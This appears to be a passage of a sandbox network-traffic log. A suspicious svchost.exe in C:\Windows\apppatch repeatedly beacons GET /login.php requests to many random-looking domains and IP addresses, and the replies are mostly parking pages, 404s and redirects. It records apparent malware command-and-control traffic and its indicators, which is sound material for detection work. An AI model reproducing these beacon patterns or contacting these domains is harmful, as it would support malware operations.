Aug 23, 2024 18:43:46.683646917 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:43:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2defa10e06435b44928a9b853377cfec\|8.46.123.33\|1724431426\|1724431347\|39\|2\|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50844	103.150.11.230	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:46.279321909 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:47.171315908 CEST	403	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Fri, 23 Aug 2024 16:43:47 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Aug 23, 2024 18:43:48.280520916 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:48.599822044 CEST	403	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Fri, 23 Aug 2024 16:43:48 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.5	50845	106.15.137.66	8001

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:47.198504925 CEST	295	OUT	GET /dh/147287063_637385.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.137.66:8001 Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:48.279145002 CEST	1043	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:43:48 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:43:48 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50847	106.15.137.66	8001	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:48.608925104 CEST	295	OUT	GET /dh/147287063_637385.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.137.66:8001 Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:49.688838005 CEST	1043	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:43:49 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:43:49 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50849	13.248.169.48	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:54.024509907 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50850	64.225.91.73	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:44:05.059474945 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:44:05.642157078 CEST	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Fri, 23 Aug 2024 16:44:05 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50851	154.85.183.50	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:44:05.185667038 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:44:06.065023899 CEST	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:44:05 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Aug 23, 2024 18:44:06.066418886 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:44:06.377409935 CEST	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:44:06 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.5	50852	44.221.84.105	80

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:44:05.200841904 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Cookie: btst=d106e65ece3c227125fd2b7f88318a22\|8.46.123.33\|1724431386\|1724431386\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:44:05.672282934 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:44:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d106e65ece3c227125fd2b7f88318a22\|8.46.123.33\|1724431445\|1724431386\|29\|2\|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50853	103.224.182.252	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:44:05.367219925 CEST	302	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Cookie: __tad=1724431387.3029143 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:44:06.015809059 CEST	242	IN	HTTP/1.1 302 Found date: Fri, 23 Aug 2024 16:44:05 GMT server: Apache location: http://ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	61321	103.224.212.210	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:44:05.509303093 CEST	302	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Cookie: __tad=1724431387.5010053 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:44:06.121805906 CEST	244	IN	HTTP/1.1 302 Found date: Fri, 23 Aug 2024 16:44:06 GMT server: Apache location: http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	61322	15.197.240.20	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:44:06.041601896 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	61323	64.190.63.136	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:44:06.361743927 CEST	354	OUT	GET /login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431387.3029143 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:44:07.047667980 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:44:06 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_JS32QAwKogUIcGq/vf7X7bCxSeIZeY+TEjx7nbtsIEp5ZnQImckA9c/6CFy1l6id6x8uSo/ezSjR/CRZOSM3Ag== last-modified: Fri, 23 Aug 2024 16:44:06 GMT x-cache-miss-from: parking-89b87dbbb-9mgtf server: Parking/1.0 Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4a 53 33 32 51 41 77 4b 6f 67 55 49 63 47 71 2f 76 66 37 58 37 62 43 78 53 65 49 5a 65 59 2b 54 45 6a 78 37 6e 62 74 73 49 45 70 35 5a 6e 51 49 6d 63 6b 41 39 63 2f 36 43 46 79 31 6c 36 69 64 36 78 38 75 53 6f 2f 65 7a 53 6a 52 2f 43 52 5a 4f 53 4d 33 41 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_JS32QAwKogUIcGq/vf7X7bCxSeIZeY+TEjx7nbtsIEp5ZnQImckA9c/6CFy1l6id6x8uSo/ezSjR/CRZOSM3Ag==><head><meta charset="utf-8"><title>vofycot.com - This website is for sale! - vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and best
Aug 23, 2024 18:44:07.047718048 CEST	1236	IN	Data Raw: 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f Data Ascii: source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com hAECas it all. We hope you find what you are searching for!"><link rel="icon" type="ima
Aug 23, 2024 18:44:07.047724962 CEST	1236	IN	Data Raw: 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d Data Ascii: ay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visibl
Aug 23, 2024 18:44:07.047756910 CEST	1236	IN	Data Raw: 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c Data Ascii: ton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.annou
Aug 23, 2024 18:44:07.047765970 CEST	1236	IN	Data Raw: 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 Data Ascii: a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint_
Aug 23, 2024 18:44:07.047771931 CEST	1236	IN	Data Raw: 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c Data Ascii: ext{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-tra
Aug 23, 2024 18:44:07.047777891 CEST	1236	IN	Data Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 Data Ascii: ckground-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff
Aug 23, 2024 18:44:07.048254013 CEST	1236	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 Data Ascii: ransform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:
